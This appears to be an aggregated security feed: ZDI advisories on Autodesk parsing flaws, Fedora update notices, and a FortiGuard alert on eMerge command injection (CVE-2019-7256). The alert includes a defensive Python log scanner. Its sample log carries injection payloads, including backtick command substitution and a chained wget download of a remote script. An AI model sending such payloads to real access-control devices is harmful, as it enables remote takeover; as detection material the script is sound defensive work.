This vulnerability allows remote attackers to execute arbitrary code on affected installations of Autodesk DWG TrueView. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-23138.
ZDI-24-295: Autodesk FBX Review ABC File Parsing Out-Of-Bounds Write Remote Code Execution Vulnerability
This vulnerability allows remote attackers to execute arbitrary code on affected installations of Autodesk FBX Review. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-23139.
micropython-1.22.2-1.fc39
FEDORA-2024-34aa24af35
Packages in this update:
micropython-1.22.2-1.fc39
Update description:
Update to 1.22.2
Security fixes for CVE-2023-7158 and CVE-2023-7152
micropython-1.22.2-1.fc40
FEDORA-2024-a3b517705e
Packages in this update:
micropython-1.22.2-1.fc40
Update description:
Update to 1.22.2
Security fixes for CVE-2023-7158 and CVE-2023-7152
micropython-1.22.2-1.fc38
FEDORA-2024-51e55a7065
Packages in this update:
micropython-1.22.2-1.fc38
Update description:
Update to 1.22.2
Security fixes for CVE-2023-7158 and CVE-2023-7152
Nice Linear eMerge Command Injection Vulnerability (CVE-2019-7256)
What is the vulnerability?
Threat actors are actively targeting Nice Linear eMerge E3-Series devices to exploit a five-year-old critical vulnerability. Tracked as CVE-2019-7256, it is a command injection flaw that can give an attacker remote code execution and full control of the system.
The Nice Linear eMerge E3-Series is an access control system widely deployed in commercial and industrial environments worldwide, so the potential impact of this vulnerability is broad.
What is the recommended Mitigation?
Nice has published a security bulletin advising users to apply the latest firmware and recommending defensive measures to reduce the risk of exploitation: https://linear-solutions.com/wp-content/uploads/Service-Bulletin-for-Telephone-Entry-Products-04-12-2023.pdf
What FortiGuard Coverage is available?
FortiGuard Labs has an existing IPS signature, "Linear.eMerge.card_scan_decoder.php.Command.Injection", that blocks attack attempts targeting this vulnerability, and an OT virtual patch is available for auto-patching.
Fortinet customers are protected against exploitation attempts by this signature; however, applying the firmware patches released by the vendor is still recommended to remove the underlying risk.
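The IPS signature name above identifies the attacked endpoint (card_scan_decoder.php) but the page does not say what the signature matches on. As an added example, not FortiGuard's signature and not vendor code, the script below does what a defender without an IPS would do with web-server logs from the controller: it flags requests to card_scan_decoder.php whose query-string values contain shell metacharacters after URL decoding, decoding twice so double-encoded payloads are caught. The combined-log format, the sample log lines and the parameter names in them are constructed for this example and are not taken from the advisory.

```python
"""Offline detector for command-injection attempts against the
card_scan_decoder.php endpoint, working from web-server access logs.

Added example (not FortiGuard's signature, not Nice/Linear code). Assumes
Apache/nginx combined-format access logs. Parameter names in the sample
log below are made up for illustration.
"""
import re
from urllib.parse import urlsplit, unquote_plus

# Combined-format access log: client IP, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Characters that let input break out of a shell argument: command
# separators, pipes, backtick/$() substitution, redirection, newlines.
SHELL_META = re.compile(r'[;&|`$<>\n]')

TARGET_SCRIPT = "card_scan_decoder.php"


def decode_value(raw, rounds=2):
    """URL-decode a query value repeatedly so double-encoded payloads
    (e.g. %2560 -> %60 -> `) are inspected in their final form."""
    value = raw
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def inspect_line(line):
    """Return an alert dict for one log line, or None if it looks benign."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    if parts.path.rsplit("/", 1)[-1].lower() != TARGET_SCRIPT:
        return None
    findings = []
    # Split on '&' ourselves instead of parse_qsl, so a ';' inside a value
    # is kept as payload rather than treated as a pair separator.
    for pair in parts.query.split("&"):
        name, _, raw = pair.partition("=")
        value = decode_value(raw)
        metachars = sorted(set(SHELL_META.findall(value)))
        if metachars:
            findings.append({"param": name, "value": value, "metachars": metachars})
    if not findings:
        return None
    return {"ip": m.group("ip"), "ts": m.group("ts"), "findings": findings}


def scan_log(text):
    """Run inspect_line over every line; return alerts in log order."""
    alerts = []
    for line in text.splitlines():
        alert = inspect_line(line)
        if alert:
            alerts.append(alert)
    return alerts


# Constructed sample log (not real traffic). Lines 2, 4 and 5 should alert:
# backtick substitution, ';'-chained download, and a double-encoded backtick.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Apr/2024:12:00:01 +0000] "GET /card_scan_decoder.php?card=30&door=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Apr/2024:12:00:07 +0000] "GET /card_scan_decoder.php?card=30&door=%60id%60 HTTP/1.1" 200 640 "-" "curl/7.88.1"
198.51.100.2 - - [10/Apr/2024:12:00:09 +0000] "GET /index.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Apr/2024:12:00:11 +0000] "GET /card_scan_decoder.php?card=1;wget%20http://203.0.113.9/x.sh HTTP/1.1" 200 640 "-" "curl/7.88.1"
203.0.113.9 - - [10/Apr/2024:12:00:15 +0000] "GET /card_scan_decoder.php?card=30&door=%2560id%2560 HTTP/1.1" 200 640 "-" "curl/7.88.1"
"""

if __name__ == "__main__":
    for a in scan_log(SAMPLE_LOG):
        for f in a["findings"]:
            print(f'{a["ts"]} {a["ip"]} param={f["param"]} '
                  f'value={f["value"]!r} metachars={f["metachars"]}')
```

The metacharacter check is deliberately narrow to the one script the signature names; widening it to every PHP endpoint would trip on legitimate values containing "&" or "$". Pointing it at a real controller means feeding it the device's actual access log and, since exploitation here is a single GET, treating even one hit from an external address as an incident rather than a scan.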
micropython-1.22.2-1.fc41
FEDORA-2024-9f2a705459
Packages in this update:
micropython-1.22.2-1.fc41
Update description:
Automatic update for micropython-1.22.2-1.fc41.
Changelog
* Fri Mar 22 2024 Charalampos Stratakis <cstratak@redhat.com> - 1.22.2-1
- Update to 1.22.2
- Security fixes for CVE-2023-7158 and CVE-2023-7152
- Fixes: rhbz#2256176, rhbz#2256178, rhbz#2259215
* Thu Jan 25 2024 Fedora Release Engineering <releng@fedoraproject.org> - 1.21.0-3
- Rebuilt for https://fedoraproject.org/wiki/Fedora_40_Mass_Rebuild
* Sun Jan 21 2024 Fedora Release Engineering <releng@fedoraproject.org> - 1.21.0-2
- Rebuilt for https://fedoraproject.org/wiki/Fedora_40_Mass_Rebuild
opensmtpd-7.4.0p1-1.el9
FEDORA-EPEL-2024-5e764f8789
Packages in this update:
opensmtpd-7.4.0p1-1.el9
Update description:
opensmtpd: 7.4.0p1 release
opensmtpd-7.4.0p1-1.fc40
FEDORA-2024-28fde3feb7
Packages in this update:
opensmtpd-7.4.0p1-1.fc40
Update description:
opensmtpd: 7.4.0p1 release
podman-4.9.4-1.fc39
FEDORA-2024-dd32f390b3
Packages in this update:
podman-4.9.4-1.fc39
Update description:
Security fix for CVE-2024-1753
Automatic update for podman-4.9.4-1.fc39.
Changelog for podman
* Mon Mar 25 2024 Packit <hello@packit.dev> - 5:4.9.4-1
- [packit] 4.9.4 upstream release
* Fri Mar 01 2024 Debarshi Ray <rishi@fedoraproject.org> - 5:4.9.3-5
- Show the toolbox RPMs used to run the tests
* Fri Mar 01 2024 Debarshi Ray <rishi@fedoraproject.org> - 5:4.9.3-4
- Avoid running out of storage space when running the Toolbx tests
* Fri Mar 01 2024 Debarshi Ray <rishi@fedoraproject.org> - 5:4.9.3-3
- Silence warnings about deprecated grep(1) use in test logs
* Fri Mar 01 2024 Debarshi Ray <rishi@fedoraproject.org> - 5:4.9.3-2
- Update how Toolbx is spelt